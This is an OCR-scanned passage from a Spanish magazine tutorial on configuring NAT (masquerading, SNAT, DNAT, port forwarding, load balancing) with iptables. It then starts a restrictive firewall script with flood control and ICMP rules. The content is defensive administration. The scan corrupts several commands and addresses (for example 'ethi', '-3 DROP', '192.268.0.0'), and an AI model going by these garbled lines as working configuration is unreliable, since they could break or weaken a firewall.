quiere conectarse es la 172.28.0.50 
en lugar de la 192.168.0.50... esto se 
debe a que el switch que estoy usando 
no es “muy bueno”, casi tendría que 
decir que es una birria... pero no son 
esos todos nuestros problemas... 
aunque el switch fuese “bueno” 
tendríamos el VERDADERO 
PROBLEMA. 


Recordarás que en su momento, en el 
escenario expuesto, dijimos que SÓLO la 
IP 172.28.0.254 puede comunicarse con 
el router, y aunque este switch no truncase 
la IP, no tendríamos acceso al router... 
puesto que la IP que intenta acceder a 
google, no es la permitida, es decir, el 
router “ve” que le llega una petición con 
origen IP 192.168.0.50, y lo primero que 
“piensa” es: 


“Menudo cacao, resulta que yo 
formo parte de la red 
172.28.0.0/16 y me llega un 
paquete de un PC que no pertenece 
a ese rango.... pues lo descarto. ...” 


O también puede actuar asÍ: 


“Rayos.... la IP 192.168.0.50 
quiere llegar a google, jajajaja, no 
puedes majete... porque soy 
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esclavo de la IP 172.28.0.254 y 
obedezco órdenes de ella y nada 
más que de ella... descartado...” 


¿Cómo solucionar esto? 


Pues hay varias formas, voy a expresarlo 
en palabras y luego en la orden adecuada 
de IPTables. 


Lo que hay que hacer, lo que hay que 
explicar al cortafuegos es: "que 
cuando cualquier paquete cuyo 
origen sea la IP 192.168.0.50 (o de 
toda la red si así lo queremos) y 
atraviese el cortafuegos con destino 
a otras redes, debe cambiar esa IP 
por la permitida, es decir, que 
traduzca las direcciones IP del rango 
de red 192.168.0.0/24 como una 
ÚNICA IP 172.28.0.254” 


Señores, acabamos de descubrir lo que 
puede llegar a significar NAT. 


Desgraciadamente NAT puede 
implementarse de muchas formas y 


maneras, como SNAT, DNAT, 
enmascaramiento, reenvío de 
puertos, redirección, NAT 


transparente, equilibrio de carga y 
alguno más que seguro que me dejo por 
el camino. 


De ello nos ocuparemos en las próximas 
secciones, antes... vamos a resolver 
nuestro pequeño entuerto. 


Voy a elegir el enmascaramiento, luego 
lo entenderás mejor ahora lo que importa 
es que se resuelva nuestro misterio.... 


El enmascaramiento es una forma 
simplificada de SNAT en la que los 
paquetes que viajan reciben la 
dirección IP de la interfaz de salida 
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pd 


192.168.0.50 


como dirección origen, es decir: cuando 
el router de nuestro escenario reciba el 
paquete “/o verá” como si se lo hubiese 
enviado la 1P 172.28.0.254 en lugar de 
la verdadera IP 192.168.0.50, será 
IPTables el que se encargue de realizar 
esa traducción y cuando el router entregue 
el resultado, lo hará a la IP 172.28.0.254 
y será de nuevo IPTables quien tenga 
que volver a traducir a la verdadera 
dirección origen, en el ejemplo, la IP 
192.168.0.50 


Gráficamente esto es así: 


192.168.0.254 


172.28.0.254 XXX.XXX.XXX.XXX 


- INTERNET 


Los paquetes que entran por la interface 
192.168.0.254 del servidor LINUX con 
destino a Internet, salen traducidos como 
si su IP origen fuese la 172.28.0.254. 


Los paquetes que regresen de esa misma 
conexión serán entregados a la IP 
172.28.0.254 del cortafuegos, éste volverá 
a traducir la dirección destino apropiada 
y sacará el paquete de datos por la IP 
192.168.0.254 para que llegue al 
verdadero origen de la conexión. 


Para conseguir este logro, tanto el router 
como JPTables guardan una tabla NAT 
en su memoria y van “anotando” las 
diferentes conexiones, puertos, ip's origen, 
destino, etc... para realizar esas 
conversiones... esto se explicó en el 
artículo 22 del cual puedes conseguir un 
extracto en: 


http://www .forohxc.com/Docs/fw/ipt/in 
trofw.pdf 


: “Figura 3, Traducción 
NAT de la red 
192.268.0.0/24 en 


UNA ÚNICA 1P como 
172.28.0.254 
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Bien, pues en nuestro IPTables tenemos 
que incluir esta línea de comando: 


hd rootOlinux-rh8:- 
Archivo Editar Ver Terminal lr Ayuda 


si Le acabamos de explicar a IPTables que 

todo aquello cuyo origen (-Ss) sea la red 
192.168.0.0/24 (nuestra LAN) cuando 
se coloque en la interfaz ethO (es decir 
en 172.28.0.254) se enmascare (-j 
MASQUERADE) con dicha ip, eso sí, lo 
hará DESPUÉS de reenviarla a la interfaz 
eth0 (POSTROUTING). Si lo hiciese 
antes (PREROUTING), además de recibir 
un bonito error en este caso concreto, 
no funcionaría. 


Enmascaramiento 
NAT de origen 


De hecho, no se puede usar 
PREROUTING con SNAT y/o con 
MASQUERADE, si usamos estas “formas” 
de NAT tendremos que usar 
POSTROUTING 


Como estarás imaginando, lo contrario 
ocurre con DNAT, con el que tendremos 
que usar PREROUTING en lugar de 
POSTROUTING, “dentro de unas pocas 
líneas” lo veremos mejor y con más 
detalle, pero vamos a ver si después de 
añadir esta entrada ya tenemos acceso 
a Internet desde el equipo de la LAN 
pasando por IPTables. 


Pantalla 16. Prueba 
de conectividad entre 


el cliente e Intemet 
con éxito. 


- Diseño de Cortafuegos d 


[rootéelinux-rh8 root]* iptables -t nat -A POSTROUTING -o eth0 -s 192.168.0.0/24 -j MASQUERADE ] 


ex CAMWINDOWSSystem3 2icmd.exe 
¡CiDocuments and Settings Wictor>ping www.google.es 
Haciendo ping a www.google.akadns.net [66.182.11.99] con 32 bytes de datos 
desde 66. OE 11.99: 
66.102.11.99: 
66. 182.11.99: 
66.102.11.99 
4, perdidos B 


en milisegundos: 
» Máximo = 183ms, Media = 175ms 


Como verás... 


Como verás “ahora” la IP de google no es la misma que 


antes... esto no tiene que ver con IPTables, es una 
característica especial de este buscador, que dependiendo 
de la IP, la zona e incluso el momento, podemos 


Página 52 


encontrarnos ante una máquina u otra... normalmente 
el “más cercano” a nuestra IP (o bien porque se efectúa 
un balanceo de carga entre las varias máquinas que 


sirven el buscador de google). 


Reenvío y enmascaramiento de 
Red Origen 


Nuestro primer ejemplo es muy simple, 
no tiene seguridad alguna, de hecho los 
paquetes de datos entran y salen del 
cortafuegos “como Pedro por su casa”, 
se acepta todo, se permite todo, pero 
estamos empezando... terminaremos con 
el reenvío para pasar a NAT “en serio” 


Antes usamos reglas de reenvío de este 
modo: 


Lo primero que hay que resaltar es que 


hubiese sido más adecuado comenzar 


Para hacer algo más restrictivo el reenvío 
de paquetes, pero también podríamos 
haber *limitado” los host entre los que el 
cortafuegos debe reenviar los paquetes, 
por ejemplo: 


líneas del 
conseguiremos que sólo el equipo 


Con estas código 4, 


ódigo 4. Reenvío y 


Enmascaramiento 
NAT de origen 


PC PASO A PASO N* 24 


Diseño de Cortafuegos de Red con IPTables - Diseño de Cortafuegos de 


ódigo 5. Reenvio y 
Enmascaramiento 
NAT de origen para un 
Único host 


lgo 6. Reenvío y 
Enmascaramiento 
NAT de origen con 

control de conexiones 
establecidas 


192.168.0.50 (o los que se incluyan 
detrás de la opción -s) puedan 
comunicarse con el equipo 172.28.0.1 


Ahora, en el listado del código 5, todos 
los equipos de la red 192.168.0.0 pueden 
reenviar paquetes a los equipos de la 
red 172.28.0.0 y viceversa; pero sólo la 
máquina 192.168.0.50 tendrá 


comunicación con Internet, puesto que 
es la única que en la que se establece el 
enmascaramiento IP para que se pueda 
comunicar con el router. 


Sin embargo hay un pequeño problema: 
el tráfico entre ambas interfaces se 
acepta. Eso puede suponer un riesgo de 
cara a las conexiones que vienen de 
Internet y que pretenden acceder a la 
red 192.168.0.0, podrían “meterse” hasta 
el fondo... podemos solucionarlo de 
muchas formas, pero como estamos con 
el reenvío, se puede hacer algo así: 


Con el código 6 hemos conseguido que 


sólo las máquinas de la red 
192.168.0.0/24 (eth1) tienen permiso 
para iniciar conexiones y por consiguiente 
al reenvío. Aquellos intentos de conexión 
y reenvío que no tengan como IP origen 
alguna de la red ethi (192.168.0.0/24) 
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serán descartados y registrados, siendo 
además el host 192.168.0.50 el único 
que podrá comunicarse a Internet por el 
enmascaramiento en origen. 


Traducción de direcciones de 
red NAT 


El uso de NAT permite a un cortafuegos 
modificar las direcciones IP origen y/o 
destino de los paquetes así como los 
puertos que usan las comunicaciones. 


Principalmente encontramos dos tipos 
de NAT: 


> Traducción de direcciones de red de 
origen: SNAT 

> Traducción de direcciones de red en 
destino: DNAT 


Ante IPTables hay que recordar unas 
cuestiones muy simples pero 
IMPORTANTES: 


b>b_DNAT se efectúa en la cadena 
PREROUTING 

b SNAT en la cadena POSTROUTING 
b Al modificar un paquete en el 
origen (SNAT), las cadenas INPUT, 
FORWARD y OUTPUT ven la 
dirección de origen sin modificar 
b Si modificamos un paquete en 
destino (DNAT), son las cadenas 
FORWARD e INPUT las que ven la 
dirección modificada. 


Estas tres reglas son sencillas y es 
muy, muy importante que no las 
olvides, porque si lo haces puedes 
llegar a hacerte “e/ lío padre” entre 
unas y otras... ahora vamos a hablar “en 
general” de cada uno de estos tipos de 
NAT, con ejemplos y con las explicaciones 
necesarias. 
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Enmascaramiento 
NAT en destino con 
enmascaramiento en 
origen 
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Traducción de direcciones de 
red destino. DNAT 


Este tipo de traducción puede cumplir 
tres objetivos: 


> Envío en representación 
transparente. Como si fuese un proxy 
transparente. 

> Reenvío a puertos, PAT 

> Equilibrio de carga en la red. 


DNAT como envío transparente. 


Permite a los clientes solicitar servicios 
o peticiones de datos usando una 
dirección IP “prestada”, por eso decía 
antes que se comportaba como si fuese 
un proxy. 


Sin embargo, no confundas DNAT como 
una regla para que los clientes de “tu 
red” accedan a redes externas... es 
“parecido” pero no exactamente eso... 
DNAT lo usaremos para ofrecer 
“nuestros” servicios a redes 


externas, por ejemplo: 


La última regla permite que clientes 
externos efectúen conexiones con la 
máquina 192.168.0.50 a través de la 
interfaz 172.28.0.254, como a su vez 
esta interfaz está conectada al router, 
los clientes de Internet podrán pasar por 
nuestro firewall hacia la máquina 
192.168.0.50, la cual ofrecerá los 
servicios seleccionados. 


Ya... pero qué servicios? Pues tal y 
como lo hemos configurado.... TODOS!!!! 
Es decir, la máquina 192.168.0.50 está 
“vendida” a merced de lo robusto que sea 
su sistema operativo o de un posible 
cortafuegos de host en esa máquina.... 


fa] 213.0.215.172 - Cliente de Terminal Server 


Iniciar sesión en Windows 


Microsoft 
Copyright €) 1985-1999 


El 1 "Wii 52000 Corporation 


Basado en tecnología NT 


Pm TT | 


administrador 


Nombre de 
usuario: 


coo | 0 


Como es lógico esto no ofrece seguridad 
alguna, es como abrir el melón para que 
todo el que quiera un pedacito, se conecte 
y acceda al servidor.... pero bueno, es un 
modo de redirigir las peticiones externas 
a uno o varios host de la red interna... 


Al menos, vamos a restringir el acceso 
desde el exterior, sólo para que se pueda 
acceder al servidor web.... 


por Terminal Services 

desde Internet a un 
host interno gracias a 
DNAT 
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| Código 8. Reenvío, 

Enmascaramiento y 
DNAT para un solo 
host 


Ahora, desde el “exterior” sólo se podrá 
acceder a la máquina 192.168.0.50 
mediante el puerto 80. Te advierto que 
seguimos “sin seguridad”, observa que 
las políticas por defecto es aceptar todos 
los paquetes entrantes, los salientes y 
en la cadena FORWARD aceptamos 
cualquier paquete de datos para el 
reenvío... pero.... vamos avanzando que 
es lo que importa... 


Si intentamos acceder a los servicios de 
Terminal Services ahora no podremos... 


antalla 18. Acceso [MEM Tin 
por Terminal Senices 


_ El cliente no se puede conectar con servidor Terminal 
no permitido por po 


Server. Éste debe estar muy ocupado. Intente 


DNAT conectarse más tarde. 


Ni a cualquier otro servicio excepto el 

que ofrece este servidor por su puerto 80. 
A http://213.0.215.172findex.html - Microsoft Internet Ex... Am) 
Archivo Ayuda 


Q ars y E a A A ) Búsqueda $2 Favoritos 


ulos 4] Hotmail gratuito 42] Personalizar vínculos 4%] Windows 
rección €l http://213.0.215.172findex.html 


Edición Yer Favoritos Herramientas 


Hola, Bienvenido 
a la traducción de direcciones 


WD Internet 


Pantalla 19. Acoeso 
WEB desde Internet a 
un hostintemo gracias 


Reenvío de puertos 


Con el mismo ejemplo anterior podemos 
hacer “algún cambio”, ver el código 9: 


aDNAT 
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Con la modificación de la última línea, los 
clientes externos pueden acceder al 
servidor web que reside en 192.168.0.50 
por el puerto 80, sin embargo, dicho 
server deberá estar escuchando por el 
puerto 9000. De hecho los clientes 
internos, los que pertenecen a su misma 
red, lo deberán hacer por ese puerto... 
observa: 


Enmascaramiento, DNAT 
para un solo host con 
reenvío de puertos en 

destino 


Acceso al server desde Internet.... 


0. Acceso WES 
desde Intemet a un host 


A http:1/213.0.215.172findex. html - Microsoft Internet Ex... 
Ayuda 


Bd -0-294 (2 (O ise ez Favor] "emana DW 


con reenvío de puertos 


Archivo Edición Ver Favoritos Herramientas 


s (E) Hotmail gratuito 4%] Personalizar vínculos 4%] Windows 


11 ¿Lhttp:1/213.0.215.172findex.htral 


Hola, Bienvenido 


a la traducción de direcciones 
con DNAT 


WD Internet 


Acceso al server desde la LAN por el 
puerto 9000 (observa que la barra de 
dirección se especificó el puerto) 


lcceso WEB 
desde la LAN 


A http://192.168.0.50:9000findex. html - Microsoft Interne... [f 
Ayuda 


BA ” O - E ad O To A ) Búsqueda SJ 2 Favoritos 


s (E) Hotmail gratuito 4%] Personalizar vínculos 4£] Windows 


dE] http://192.168.0.50:9000/index.html 


Archivo Edición Yer Favoritos Herramientas 


vw Sr 


eS 


Hola, Bienvenido 

a la traducción de direcciones 

con DNAT 
E] Listo 


0 Internet 
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Mientras que si intentamos acceder por 
la red interna al puerto 80, no 
conectaremos con el servidor.... 


=== 
“A No se puede encontrar el servidor - Microsoft Internet Ex... la [O 
Pp ar E) 


¿ Archivo Edición Yer Favoritos Herramientas Ayuda 


Q us >) EN [2 € LO Búsqueda A Favoritos 


¿ Vínculos 48] Hotmail gratuito 48) Personalizar vínculos 4E] Windows 


¿ Dirección € http://192.168.0.50/index.htral 


[1] No se puede mostrar la página 


yr 


La página Web solicitada no está disponible en este momento. 
Puede que el sitio Web tenga problemas técnicos o que necesite 
ajustar la configuración de su explorador. 


O internet 


desde LAN. Fallido... 


Tanto si utilizamos la redirección de 
puertos como si no, podemos incluir 
tantas reglas DNAT como sean necesarias 
para que los clientes externos o internos 
accedan a nuestros servicios. Por ejemplo, 
imagina una red con varios servidores, 
asi: 


Web: 192.168.0.50 
Terminal services: 192.168.0.50 
FTP: 192.168.0.100 

Control remoto de la máquina de 
producción: 192.168.0.9, puerto 
44551 

Correo saliente: 192.168.0.33 
Correo entrante: 19241681033 
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Equilibrio de carga 


El conjunto de reglas y cadenas anteriores 
nos dan una idea de lo que una red puede 
ser... 


Imaginemos que nuestra empresa tiene 
un alto número de visitas web, o bien, 
ofrecemos un determinado tipo de 
servicios que exigen al servidor una carga 
de trabajo extra... o simplemente 
queremos ofrecer “redundancia” varios 
servidores disponibles para nuestros 
clientes. .... 


Para estos casos, IPTables permite 
especificar más de una dirección IP en 
una regla DNAT. Cuando un cliente solicita 
el servicio, IPTables elige uno de los 
destinos indicados, cada máquina del 
colectivo de IPs especificadas recibe una 
fracción del tráfico, equilibrando la carga 
del trabajo en la granja o conjunto de 
servidores, ver código 11 


En el ejemplo anterior, los servicios 
solicitados por clientes externos se 
“repartirán” entre los servidores 
192.168.0.50 .51-.52-.53-.54 y .55 
equilibrando el trabajo entre ellos. 


o, 
Enmascaramiento, DNAT 


para múltiples host 
internos 


Enmascaramiento, DNAT 


con balanceo o 


equilibrado de carga 
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Traducción de direcciones de 
red con Redirección. NAT 
REDIRECT 


Es una forma especial de NAT en la que 
las solicitudes enviadas a una máquina 
las maneja el propio cortafuegos (es 
decir, el propio cortafuegos proporciona 
el servicio), sin embargo los clientes 
“piensan” que es la máquina servidor el 
que se lo proporciona. 


También se puede usar NAT REDIRECT 
con reenvío a puertos como lo hicimos 
antes y utilizar los determinantes -s y 
--dport para seleccionar los destinos y 
los puertos. 


Por ejemplo: 


Cuando un cliente accede por el Puerto 
80 a la máquina 172.28.0.99 debería ser 
proporcionado ese servicio por la 
máquina, sin embargo el cortafuegos 
intercepta el paquete y aplica DNAT para 
que contengan su propia dirección, de 
tal forma que el servicio se ejecuta en el 
cortafuegos y responde al cliente. 


Ni tan siquiera tiene que existir la 
dirección, el cliente no lo sabrá, el 
cortafuegos está preparado para ser capaz 
de llegar a la ruta y es él quien responde. 


Esto es útil a veces para simular servicios 
o puertos, pero hay que guardar cuidado 
si se implementan los servicios “de 
verdad” en el cortafuegos, ten en cuenta 
que ejecutar servicios públicos en un 
firewall es exponerlo a ser 
comprometido. 


Lo más habitual es que la redirección de 
usa para que accedan “máquinas de 
confianza” o locales, no le daremos mas 
cuerda a la redirección, pasemos a SNAT. 
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Traducción de direcciones de 
red de origen. SNAT 


SNAT es lo “opuesto” a DNAT, mientras 
que DNAT modifica las direcciones y 
puertos destino de los paquetes, 
SNAT lo hace con el origen de los 
mismos. 


SNAT lo podemos usar para: 


> Comunicar las máquinas internas 
que no disponen de enrutamiento con 
otras redes o con Internet. 

b Permitir que varios hosts (o todos) 
compartan una misma dirección IP 
b Ocultar la verdadera IP de una 
máquina 

> Para resolver algunos problemas que 
pueden surgir con su opuesto DNAT 


Recuerda que DNAT usaba la cadena 
PREROUTING y como SNAT es lo contrario, 
usará la cadena POSTROUTING 


También, cuando hemos visto DNAT, se 
usaba -i seguido del nombre de la interfaz, 
ahora cuando queramos usar SNAT lo 
haremos con -o y nombre de la interfaz 


Al igual que DNAT podía modificar puertos 
y direcciones en destino (-d, --dport y - 
-to-destination) SNAT puede hacer lo 
propio pero con el origen, esto es, 
-=S, --sport --to-source. 
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Así que voy a poner unos cuantos 
ejemplos y nos liquidamos SNAT en un 
periquete... 


Esta regla proporciona SNAT para toda 


la red interna (192.168.0.0/24) 


traduciendo la dirección origen en 
172.28.0.254, que será la que vean los 
los que se comunica. 


host con 


Lo mismo que la anterior, pero sólo para 
la máquina 192.168.0.50 y no para toda 
la red... sólo esa IP será traducida en 
origen, el resto “saldrá con su propia 
dirección” 


El mayor problema que nos podemos 
encontrar con esto, es que si el tráfico 
en nuestra red es muy alto, es probable 
que los puertos disponibles se agoten... 
para eso podemos usar esto: 


De ese modo tenemos múltiples 
direcciones SNAT. 


También podemos especificar 
explícitamente los puertos de origen que 
se van a utilizar por SNAT, de este modo: 


Ya hablamos antes del enmascaramiento, 
dije que era una forma *simplificada” de 
SNAT. Es muy útil cuando se usan 
servidores DHCP y/o conexiones 
telefónicas por parte de los clientes. 


El enmascaramiento es la imagen 
reflejada de la redirección, recuerda 
lo que dijimos de ello, la única diferencia 
entre SNAT y MASQUERADE es que 
con el enmascaramiento la dirección 
origen sustituta es la propia 1P del 
cortafuegos, mientras que con SNAT 
podemos elegir... 


Ya hemos usado bastante la opción de 
MASQUERADE, sólo algunos apuntes más: 


Estas tres reglas, ni te las comento... 
debes, puedes, eres CAPAZ de 
descubrir lo que hacen... o no? 


Otro de los usos “imprescindibles” de 
SNAT es cuando proporcionamos acceso 
externo a un servidor interno como 
hicimos antes con DNAT. 


Si hacemos DNAT pero no hacemos 
SNAT, los clientes externos llegarán al 
servidor... pero éste no podrá entregar 
la respuesta a menos que goce de 
enrutamiento con SNAT, por eso en los 
scripts anteriores con DNAT siempre incluí 
el enmascaramiento. 


Hay otra forma, lo que se llama un DNS 
Split Horizon, DNS de horizonte 
dividido, que en resumen consiste en 
disponer de un servidor DNS para host 
externos y otro para host internos. 


Pero es más sencillo como lo hemos 
solventado en ocasiones anteriores, es 
decir, combinando SNAT y DNAT, de tal 
forma que cuando el cortafuegos recibe 
una respuesta del servidor, invierte DNAT 
y SNAT y reenvía la respuesta al cliente. 
No deberías tener problemas con esto, lo 
hemos utilizado en cada script de los 
ejemplos DNAT 
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Recuerda, que no sólo ha de entrar o 
salir un paquete de datos, también debe 
traducirse las respuestas de lo servidores 
si usamos DNAT 


+ http://www.hackxcrack.com/phpBB2/index.php 
H 

+ Software Libre, puedes modificarlo y/o distribuirlo 
++ bajo los términos de la Licencia GNU publicada 

H por: Free Software Fundation, www.gnu.com 

H 
HHHHHRIHARA RA HER HA IA RARA HH HERA 
++ VARIABLES DEL CORTAFUEGOS 
HHHHHHHHRRARR RRHH. RARA RAR HH HHHHHRTA 
H 
Ht Modifica los valores para ajustar tu configuración 
H 

+ Datos del cortafuegos 
NICEXTERNAFW="eth0" 
IPEXTERNAFW="172.28.0.254" 
NICINTERNAFW="ethi" 
IPINTERNAFW="192.168.0.254" 
H 
+ REDES INTERNAS-INTERNAS (RED Y BROADCAST) 
H 
DIRREDEXTERNA="172.28.0.0" 
DIRDIFUSIONEXTERNA="172.28.255.255" 
DIRREDINTERNA="192.168.0.0" 
DIRDIFUSIONINTERNA="192.168.0.255" 
H 
++ DIRECCION IP DEL ROUTER QUE CONECTA A 
HH INTERNET 
H 
IPINTERNAROUTER="172.28.0.1" 
IPEXTERNAROUTER="213.0.211.144" 


Un cortafuegos de red!!!! 


La filosofía es la misma que la del 
script del artículo anterior, realmente 
muchas secciones de este nuevo 
cortafuegos es una copia “literal” o 
modificada del anterior, sólo que éste 
implementa NAT en origen y en destino 
para poder ofrecer esos servicios y/o 
disfrutar de ellos. 


Esta parte del código es simple de 
comprender, se trata de la definición de 
nuestras primeras variables, las que 
corresponden a las diferentes interfaces 
del cortafuegos, direcciones IP, red, 
difusión y las del router LAN/WAN.... no 
hay más comentarios Y 


Parte II. Código IPTFWRED- 
HxC 


Parte I. Código IPTFWRED-HxC 


H 

O tk IPS O REDES QUE TIENEN CONTROL TOTAL AL 

+ Cortafuegos IPTFWRED-HxC ++ CORTAFUEGOS Y A SUS SERVICIOS MEDIANTE 

ES ++ TCP/UDP 

+ Firewall de red protegida y reglas de acceso al E 

¿MENEM IPADMIN="172.28.0.254 192.168.0.50 192.168.0.254 $IPINTERNAROUTER" 
H Reglas restrictivas de E/S, validación y anti-flood hd 

4 + Listado de IPs PARA SERVICIOS ENTRANTES 


Ea 
4 


* Derechos Reservados (c) Vic_Thor 2004 Foros 
++ HackxCrack 


++ IPS QUE PUEDEN HACER PING. AÑADE LA LISTA 
++ DE IPS O REDES A LAS QUE SE PERMITE 
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++ USAR EL PROTOCOLO ICMP POR EJEMPLO: 

+ 172.28.0.0/16 11.11.11.11 6 0.0.0.0.0/0 

++ PARA TODOS 

E 

PINGSALIDA="0.0.0.0/0 192.168.0.0/24 172.28.0.0/16" 
PINGENTRADA="0.0.0.0/0 192.168.0.0/24 172.28.0.0/16" 
E 

++ IPS O REDES QUE PUEDEN ACCEDER MEDIANTE 
++ EL PUERTO SSH (22) 0.0.0.0/0 PARA TODAS 
E 

SssSH="0.0.0.0/0" 

E 

+ IP'S DE SERVIDORES INTERNOS DE LA LAN 

++ PROTEGIDA 

E 

IPWWW="192.168.0.50" 

IPDNS="" 

IPPOP3="" 

IPSMTP="" 

IPFTP="" 

IPTS="192.168.0.50" 


Continuamos con más variables y sus 
correspondientes valores. En esta ocasión 
les toca a las direcciones IP o redes que 
podrán “hacer ping” desde dentro o desde 
fuera, las conexiones “seguras” (SSH) y 
las IPs de las máquinas o servidores 
internos de nuestra LAN al que podrán 
acceder desde Internet cuando 
configuremos DNAT. 


Parte 111. Código IPTFWRED- 
HxC 


te 

++ CONTROL DE FLOOD 

H 

CONTROLSYN="-m limit --limit 5/second --limit-burst 10" 
OPCIONREG="--log-level=3 -m limit --limit 1/second --limit-burst 10" 


+ IP'S EXCLUIDAS RFC 1918 E IANA 

E 

IPEXCLUIDAS="" 

E 

++ NO SE INCLUYE EN LA LISTA DE IP'S EXCLUIDAS 


+ EL RANGO 172.28.0.0/16 AL TRATARSE DE 

++ RANGO DE RED AL QUE PERTENECE EL 

++ CORTAFUEGOS, SI TU RED ES OTRA, DEBERAS 
++ ELIMINAR DE LA LISTA ANTERIOR LA QUE TE 
++ CORRESPONDA Y AÑADIR LA 172.28.0.0/16 
E 


++ DIRECCION DE IP-LOOPBACK 
E 

LOOPBACK="127.0.0.1" 

E 
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Como en el script del artículo anterior, 
definimos las opciones que permitirán 
registrar las inundaciones syn (flood), las 
IP's que serán excluidas o que no serán 
permitidas para acceder tanto al 
cortafuegos como a la red protegida y la 
dirección de loopback. 


Observa que el valor de IP's excluidas 
está vacío, puedes incluir todas aquellas 
IP's que desees que NO TENGAN ACCESO 
a la red o desde la red. Deberían figurar 
al menos los rangos de IP privadas excepto 
las redes 192.168.0.0/24 y 172.28.0.0/16 
puesto que estas las usamos, pero las 
dejé intencionadamente vacías para que 
vayas añadiendo aquellas que quieras. 
Especifica tantas 1P's o redes como quieras 
dejando un espacio en blanco de 
separación entre una y otra. 


Parte IV. Código IPTFWRED- 
HxC 


++ ASIGNACIONES y CONTROL 
E 
SSH="$IPADMIN $LOOPBACK" 
IPT="/sbin/iptables" 
E 
HHHHHHHHAH AHH ERA HAHAHA AHH AH AHHH AAA 
++ COMPROBAR EL ESTADO DE IPTABLES 
HHHHHAHHHAHAAHHA AAA HAHAHAHA HA AHAA AAA 
E 
if [ ! -x $IPT ] 
then 

echo "Error: No se puede ejecutar Y$IPT, Revisa la configuración" 

exit 1 
fi 
E 
HHHHHAHHHAHAAHHA AAA HAHAHA AH AAHA A AAIAE 
++ BORRADO DE CADENAS, REGLAS Y PUESTA A CERO 
++ DE CONTADORES 
HHHHHHHHHAH AHH BARA HAHAHAHA HARE 
E 
$IPT -P INPUT DROP 
$IPT -P OUTPUT DROP 
$IPT -P FORWARD DROP 


for tabla in filter nat mangle 
do 

$IPT -t $tabla -F 

$IPT -t $tabla -X 

$IPT -t $tabla -Z 

done 
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Esta parte ya es conocida, es similar al script usado en éste y otros artículos llamado ./NOIPT, sólo que 
aquí las directivas “por defecto” se activan como DROP, es decir, un cortafuegos restrictivo en el que 
habrá que especificar explícitamente aquellos paquetes que deben ser aceptados. 


Parte V. Código IPTFWRED-HxC 


PMA AEREA REA REA SORA RARE RARE RE AEREA AER AE RA ERA ARA AE RAR: 
++ CREACION DE CADENAS PARA REGISTROS DE I1P'S EXLUIDAS 
TEMER AE RE AEREA RE SA AE SERE RARE ARRE RE AEREA AER AE RA ERE AER HERE: 


$IPT -N REGISTRAIPEXCLUIDAS 
+ REGLAS PARA IP EXCLUIDAS 


$IPT -A REGISTRAIPEXCLUIDAS -j LOG --log-prefix "IPT EXCLUIDAS: 
$IPT -A REGISTRAIPEXCLUIDAS -3 DROP 


TEMER AEREA AER RE RARE SERES AE ARRE RE AEREA AER AE RE AER AER AEREA: 
++ CREACION DE CADENAS PARA REGISTROS DE 
+ FLOOD 

TEMER AE AE RE AER RE SERE RAE RAE ARRE AEREA AEREA AE RA AE RARE RAE RARE: 


$IPT -N REGISTRAFLOOD 
++ REGLAS AÑADIDAS PARA EL REGISTRO DE FLOOD 


$IPT -A REGISTRAFLOOD -j LOG --log-prefix "IPT FLOOD: " $OPCIONREG 
$IPT -A REGISTRAFLOOD -j DROP 


TEMER AEREA AEREA RARE SERE RAE AR AE RE AEREA AER AE RA HERA AER AEREA 
++ IP'S EXCLUIDAS 
FMRE AA AE AEREA RAE RARE RAE ARRE AE AEREA AER AE RA AE RARE RARE RAR: 


$IPT -N IPEXCLUIDAS 
ds ipmal in $IPEXCLUIDAS 
O 


$IPT -A IPEXCLUIDAS -s $ipmal -j REGISTRAIPEXCLUIDAS 
$IPT -A IPEXCLUIDAS -d $ipmal -j REGISTRAIPEXCLUIDAS 
done 


Parte VI. Código IPTFWRED-HxC 

PERRERA ARRE AIR AER AEAI RAR REAIA ORAR AA AAIAI AAA AEAIAR ARRE 
++ CONTROL DE PAQUETES ICMP ENTRANTES 

ERAAEAL A RRE MAA REMERA ARE AEAI AAA AEREA ARE AERAL ARE RMALA A AAA 


" HOPCIONREG 


$IPT -N ENTRADA_ICMP 

for ipicmpent in $PINGENTRADA 

do 

$IPT -A ENTRADA_ICMP -p icmp --icmp-type echo-request -s $ipicmpent -j ACCEPT 
$IPT -A ENTRADA_ICMP -p icmp --icmp-type echo-reply -s $ipicmpent -j ACCEPT 
done 


$IPT -A ENTRADA_ICMP -p icmp --icmp-type destination-unreachable -j ACCEPT 
$IPT -A ENTRADA_ICMP -p icmp --icmp-type source-quench -j ACCEPT 

$IPT -A ENTRADA_ICMP -p icmp --icmp-type parameter-problem -j ACCEPT 
$IPT -A ENTRADA_ICMP -p icmp --icmp-type time-exceeded -j ACCEPT 

$IPT -A ENTRADA_ICMP -j DROP 


HARE AA AEREA AER AE RARE RAE AA AE AE AEREA AEREA AAA RAE AEREA AE AEREA AA AE AEREA 
++ CONTROL DE PAQUETES ICMP SALIENTES 
HAAAAE AAA AAA ARA AAA AE RAE RARA ARA A AEREA AAA AAA AEREA 


$IPT -N SALIDA_ICMP 

for ipicmpsal in $PINGSALIDA 

do 

$IPT -A SALIDA_ICMP -p icmp --icmp-type echo-request -d $ipicmpsal -j ACCEPT 
$IPT -A SALIDA_ICMP -p icmp --icmp-type echo-reply -d $ipicmpsal -j ACCEPT 
done 


$IPT -A SALIDA_ICMP -p icmp --icmp-type destination-unreachable -j ACCEPT 
$IPT -A SALIDA_ICMP -p icmp --icmp-type source-quench -j ACCEPT 

$IPT -A SALIDA_ICMP -p icmp --icmp-type parameter-problem -j ACCEPT 
$IPT -A SALIDA_ICMP -p icmp --icmp-type time-exceeded -j ACCEPT 

$IPT -A SALIDA_ICMP -j DROP 
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Esta parte es 
exactamente igual 
que la del script del 
artículo anterior, 
consiste en la 
definición de 
cadenas y reglas 
que “otras” usarán 
para registrar los 
accesos no 
permitidos. 


Repetimos de 
nuevo, lo mismo 
que en el artículo 
anterior, se definen 
cadenas y reglas 
para el control de 
acceso mediante el 
protocolo ICMP, 
tanto si es de salida 
(de la red protegida 
a otras) como si es 
de entrada (de otras 
a la red protegida). 
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Parte VII. Código IPTFWRED-HxC Parte VIII. Código IPTFWRED-HxC 
ELE Bien, esta parte VIII es “similar” al contenido de 
Aldea odiado , otros scripts vistos en el artículo anterior. Se trata 

de controlar el tráfico entrante y/o saliente tanto del 
$IPT -N FLOODSYN Ñ 
$IPT -A FLOODSYN $CONTROLSYN -j RETURN cortafuegos como de las redes que enlaza, en pocas 
$IPT -A FLOODSYN -j REGISTRAFLOOD 
$IPT -A FLOODSYN -j DROP palabras hace esto: 
Más de lo mismo, definición de cadenas y Para los paquetes de entrada: 


